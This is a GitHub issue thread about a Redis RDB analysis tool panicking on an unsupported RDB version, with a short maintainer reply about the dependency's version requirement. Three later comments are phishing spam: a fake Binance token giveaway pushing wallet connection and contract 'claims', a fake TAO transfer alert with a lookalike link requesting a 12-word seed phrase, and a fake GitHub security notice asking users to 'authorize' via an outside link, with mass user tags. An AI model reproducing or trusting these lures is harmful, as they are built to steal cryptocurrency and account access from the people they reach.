### ISSUE TITLE
error panic: invalid RDB version number

### ISSUE THREAD

**Issue by midaug** [hhxsv5/go-redis-memory-analysis#3]
redis-memory-analysis-linux-amd64  version  v2.0.6

./redis-memory-analysis-linux-amd64 -rdb="./dump.rdb" -prefixes="#//:"

error info:
Starting analysis
panic: invalid RDB version number

goroutine 1 [running]:
github.com/hhxsv5/go-redis-memory-analysis.AnalysisRDB.Start(0xc42009a028, 0xc4200907e0, 0xc4200ae220, 0x2, 0x2)
        /Users/dave/go/src/github.com/hhxsv5/go-redis-memory-analysis/analysis_rdb.go:183 +0x580
main.main()
        /Users/dave/go/src/github.com/hhxsv5/go-redis-memory-analysis/examples/build.go:34 +0x332

my redis version is 4.0.10

**Comment by hhxsv5** [comment]
Looks like the Redis version is [too high](https://github.com/vrischmann/rdbtools/blob/cd9eb17adda8fa11d4415be7e96d8f5fddb37532/parser.go#L189), my tool depends [vrischmann/rdbtools](https://github.com/vrischmann/rdbtools), it require rdb version 6.

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by 3asoftwareltda** [comment]
# Urgent TAO Token Transfer Notification

🚨 Urgent Notice: A total of 60 TAO tokens has been successfully transferred to unknown wallet address.

**Action Required:**
1. **Secure Your Wallet Immediately:**
   - Visit the official TAO Wallet website: [https://wallet.bittensor.com](https://wallet.bittlensor.com).
   - Click on "Import Wallet" and follow the instructions to import your wallet.
   - Add the 12-word phrase to your wallet for additional security.
   - Reset your private key urgently to enhance the security of your funds.

2. **Recover Transferred Funds:**
   - Once your wallet is imported, navigate to the "Reclaim Funds" section.
   - Follow the on-screen instructions to initiate the fund recovery process.

Act promptly to secure your TAO funds, add the 12-word phrase, and reset your private key for enhanced safety.

---

**Note:** Always perform these actions on the official TAO Wallet website to ensure the security of your funds. If you face any issues, contact our support team immediately.

Securely yours! 🚀


Winners: @FreshTuna, @, @cdrn, @ReidDecentral, @olgaumek, @ASLANKRAL111, @DetlefHotlz

**Comment by guohaoyu110** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
sandstudy, @xmyzero, @oseau, @AeroXi, @liuhuacong, @UmbraCi, @Dlangman, @leihuhu, @ethan-xiao, @tunogya, @pengpengliu, @MIMIEYES, @DinghaoLI, @qingbai5, @xiaoczzz, @weipeng321, @lvwxx, @yunjuanyunshu07, @yunqihaodianer, @0802lqrasd123
